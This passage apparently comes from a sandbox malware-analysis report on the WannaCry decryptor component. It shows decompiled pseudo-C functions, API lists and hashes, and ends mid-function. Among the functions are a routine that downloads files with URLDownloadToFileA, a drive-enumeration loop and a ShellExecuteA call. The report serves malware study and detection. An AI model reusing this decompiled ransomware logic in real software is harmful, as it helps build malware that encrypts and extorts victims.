                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825
                                                      • String ID:
                                                      • API String ID: 89657779-0
                                                      • Opcode ID: 1ad6e18a2d076e9d7f2fcb99b27d1d1a93800b7b37bec87adbc1dae2b27ad58d
                                                      • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                                      • Opcode Fuzzy Hash: 1ad6e18a2d076e9d7f2fcb99b27d1d1a93800b7b37bec87adbc1dae2b27ad58d
                                                      • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B780 Relevance: 9.1, APIs: 6, Instructions: 68filenetworkCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
				intOrPtr _v12;
				void _v259;
				char _v260;
				char _v264;
				char _v284;
				char _t15;
				int _t19;
				CHAR* _t25;
				signed int _t26;
				char* _t40;

				_t26 = __ecx;
				_t25 = _a4;
				CreateDirectoryA(_t25, 0);
				_t40 = _a8;
				asm("repne scasb");
				if( !(_t26 | 0xffffffff) == 1) {
					L4:
					return 0;
				} else {
					_t15 =  *0x421798; // 0x0
					_v260 = _t15;
					memset( &_v259, 0, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetTempFileNameA(_t25, "t", 0,  &_v260);
					_t19 = DeleteUrlCacheEntry(_t40);
					_push(0);
					_push(0);
					_push( &_v264);
					_push(_t40);
					_push(0);
					L004133CE();
					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
						DeleteFileA( &_v284);
						goto L4;
					} else {
						DeleteFileA( &_v284);
						return 1;
					}
				}
			}













                                                      0x0040b780
                                                      0x0040b787
                                                      0x0040b793
                                                      0x0040b799
                                                      0x0040b7a7
                                                      0x0040b7ac
                                                      0x0040b81d
                                                      0x0040b826
                                                      0x0040b7ae
                                                      0x0040b7ae
                                                      0x0040b7b8
                                                      0x0040b7c2
                                                      0x0040b7c8
                                                      0x0040b7d3
                                                      0x0040b7d4
                                                      0x0040b7db
                                                      0x0040b7e1
                                                      0x0040b7e7
                                                      0x0040b7e9
                                                      0x0040b7ea
                                                      0x0040b7eb
                                                      0x0040b7ed
                                                      0x0040b7f4
                                                      0x0040b815
                                                      0x00000000
                                                      0x0040b827
                                                      0x0040b82c
                                                      0x0040b83d
                                                      0x0040b83d
                                                      0x0040b7f4

                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,0019FA30), ref: 0040B793
                                                      • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                      • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,0019FA30), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                                      • String ID:
                                                      • API String ID: 361195595-0
                                                      • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                                      • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409A40 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00409A40(signed int* _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr* _v24;
				struct tagRECT _v40;
				intOrPtr _v56;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v88;
				intOrPtr _t34;
				void* _t35;
				void* _t53;
				intOrPtr _t56;

				 *[fs:0x0] = _t56;
				_v40.right = 0;
				_v40.top = 0x41679c;
				_v4 = 0;
				E00409D40( &(_v40.bottom), _a4, _a8);
				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
				L00412D5E();
				L00413010();
				_t34 =  *_v24;
				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
				L00412D52();
				_v88 = 0x415c00;
				_v56 = 1;
				L00412D52();
				 *[fs:0x0] = _v64;
				return _t35;
			}














                                                      0x00409a4e
                                                      0x00409a5d
                                                      0x00409a65
                                                      0x00409a73
                                                      0x00409a82
                                                      0x00409a9b
                                                      0x00409ac0
                                                      0x00409acc
                                                      0x00409ad7
                                                      0x00409ae4
                                                      0x00409aeb
                                                      0x00409af0
                                                      0x00409afc
                                                      0x00409b04
                                                      0x00409b0e
                                                      0x00409b18

                                                      APIs
                                                      • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                                      • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                                      • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                                      • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414Rect$#1641#5781CreateOffset
                                                      • String ID:
                                                      • API String ID: 2675356817-0
                                                      • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                                      • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004034A0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E004034A0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413620);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0xe8)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                                      0x004034a0
                                                      0x004034a2
                                                      0x004034ad
                                                      0x004034ae
                                                      0x004034ba
                                                      0x004034c6
                                                      0x004034d6
                                                      0x004034d7
                                                      0x004034e0
                                                      0x004034e4
                                                      0x004034e7
                                                      0x004034ef
                                                      0x00403519
                                                      0x0040351f
                                                      0x00403524
                                                      0x00403529
                                                      0x00403535
                                                      0x0040353d
                                                      0x0040354b
                                                      0x00403555

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                                      • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406940 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00406940(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413E30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x824)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                                      0x00406940
                                                      0x00406942
                                                      0x0040694d
                                                      0x0040694e
                                                      0x0040695a
                                                      0x00406966
                                                      0x00406976
                                                      0x00406977
                                                      0x00406980
                                                      0x00406984
                                                      0x00406987
                                                      0x0040698f
                                                      0x004069b9
                                                      0x004069bf
                                                      0x004069c4
                                                      0x004069c9
                                                      0x004069d5
                                                      0x004069dd
                                                      0x004069eb
                                                      0x004069f5

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                                      • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404EB0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00404EB0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413870);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x6c)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                                      0x00404eb0
                                                      0x00404eb2
                                                      0x00404ebd
                                                      0x00404ebe
                                                      0x00404eca
                                                      0x00404ed6
                                                      0x00404ee3
                                                      0x00404ee4
                                                      0x00404eed
                                                      0x00404ef1
                                                      0x00404ef4
                                                      0x00404efc
                                                      0x00404f26
                                                      0x00404f2c
                                                      0x00404f31
                                                      0x00404f36
                                                      0x00404f42
                                                      0x00404f4a
                                                      0x00404f58
                                                      0x00404f62

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                                      • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404310 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E00404310(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v40;
				intOrPtr _v48;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				intOrPtr _v112;
				void* _v128;
				void* _v132;
				void* _t20;
				void* _t22;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;

				_push(0xffffffff);
				_push(E004137A8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t42;
				_t39 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					E004044C0(__ecx, 0);
				}
				L00412DD0();
				_t20 = _t39 + 0x48;
				_v8 = 0;
				L00412DCA();
				L00412DC4();
				L00412DBE();
				_t40 =  *((intOrPtr*)(_t39 + 0x40));
				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
				_push(_t20);
				L00412DCA();
				_v40 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v48;
				return _t22;
			}


















                                                      0x00404316
                                                      0x00404318
                                                      0x0040431d
                                                      0x0040431e
                                                      0x00404329
                                                      0x00404331
                                                      0x00404335
                                                      0x00404335
                                                      0x0040433f
                                                      0x00404344
                                                      0x0040434c
                                                      0x00404354
                                                      0x00404361
                                                      0x0040436e
                                                      0x00404373
                                                      0x00404387
                                                      0x0040438a
                                                      0x0040438f
                                                      0x00404398
                                                      0x004043a0
                                                      0x004043ab
                                                      0x004043b5

                                                      APIs
                                                      • #470.MFC42(?,00000000), ref: 0040433F
                                                      • #5789.MFC42 ref: 00404354
                                                      • #5875.MFC42(00000001), ref: 00404361
                                                      • #6172.MFC42(?,00000001), ref: 0040436E
                                                      • #5789.MFC42(00000000), ref: 0040438F
                                                      • #755.MFC42(00000000), ref: 004043A0
                                                        • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                                        • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                                        • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                        • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                                        • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                        • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                                        • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 3301245081-0
                                                      • Opcode ID: cf1f65109254071a6a46f66f86cff4d395b2f690d68131f85178f7e4ade46d7e
                                                      • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                                      • Opcode Fuzzy Hash: cf1f65109254071a6a46f66f86cff4d395b2f690d68131f85178f7e4ade46d7e
                                                      • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403EB0 Relevance: 9.0, APIs: 6, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				_push(_t9);
				_push(0x407);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(0x408);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(2);
				L00412CE6();
				L00412D88();
				return __eax;
			}




                                                      0x00403eb2
                                                      0x00403eb8
                                                      0x00403eb9
                                                      0x00403ebe
                                                      0x00403ec5
                                                      0x00403eca
                                                      0x00403ecb
                                                      0x00403ed2
                                                      0x00403ed9
                                                      0x00403ede
                                                      0x00403edf
                                                      0x00403ee3
                                                      0x00403eea
                                                      0x00403ef1

                                                      APIs
                                                      • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                      • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                      • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                      • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                      • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                      • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092
                                                      • String ID:
                                                      • API String ID: 2547810013-0
                                                      • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                                      • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403A20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00403A20(intOrPtr _a4, intOrPtr _a8) {
				union _ULARGE_INTEGER _v8;
				union _ULARGE_INTEGER _v16;
				intOrPtr _v20;
				union _ULARGE_INTEGER _v24;
				short _v28;
				short _v32;
				short _t23;
				short _t34;
				signed int _t47;
				unsigned int _t50;

				if( *((intOrPtr*)(_a8 + 8)) != 0) {
					return 1;
				} else {
					_t50 = GetLogicalDrives();
					_t47 = 2;
					do {
						if((_t50 >> _t47 & 0x00000001) != 0) {
							_t23 =  *L" : "; // 0x3a0020
							_t34 =  *0x420760; // 0x20
							_v32 = _t23;
							_t7 = _t47 + 0x41; // 0x43
							_v28 = _t34;
							_v32 = _t7;
							_v28 = 0x5c;
							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
								_v28 = 0;
								E004026B0(_a4,  &_v32);
							}
						}
						_t47 = _t47 + 1;
					} while (_t47 <= 0x19);
					return 1;
				}
			}













                                                      0x00403a2c
                                                      0x00403ae4
                                                      0x00403a32
                                                      0x00403a41
                                                      0x00403a43
                                                      0x00403a48
                                                      0x00403a51
                                                      0x00403a53
                                                      0x00403a58
                                                      0x00403a5e
                                                      0x00403a66
                                                      0x00403a69
                                                      0x00403a6e
                                                      0x00403a73
                                                      0x00403a7f
                                                      0x00403ab8
                                                      0x00403abf
                                                      0x00403abf
                                                      0x00403a7f
                                                      0x00403ac4
                                                      0x00403ac5
                                                      0x00403ad9
                                                      0x00403ad9

                                                      APIs
                                                      • GetLogicalDrives.KERNEL32 ref: 00403A35
                                                      • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                      • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                                      • String ID: : $\
                                                      • API String ID: 222820107-856521285
                                                      • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                                      • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406EF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 89%
                                                      			E00406EF0(void* __ecx, char* _a4, void** _a8) {
				char* _v4;
				char _v8;
				void* _v12;
				char* _t14;
				char _t15;
				char* _t17;
				struct HWND__* _t18;
				char _t23;

				_t14 = _a4;
				if(_t14[0xc] != 0x201) {
					L5:
					 *_a8 = 0;
					return _t14;
				}
				_t23 = _t14[0x18];
				_t15 = _t14[0x1c];
				_v8 = _t15;
				_t17 = _t15 - _t23 + 1;
				_v12 = _t23;
				_push(_t17);
				L00412CEC();
				_v4 = _t17;
				if(_t17 != 0) {
					_t18 = __ecx + 0x4c0;
					if(_t18 != 0) {
						_t18 =  *(_t18 + 0x20);
					}
					SendMessageA(_t18, 0x44b, 0,  &_v12);
					ShellExecuteA(0, "open", _v4, 0, 0, 5);
					_t14 = _v4;
					_push(_t14);
					L00412C98();
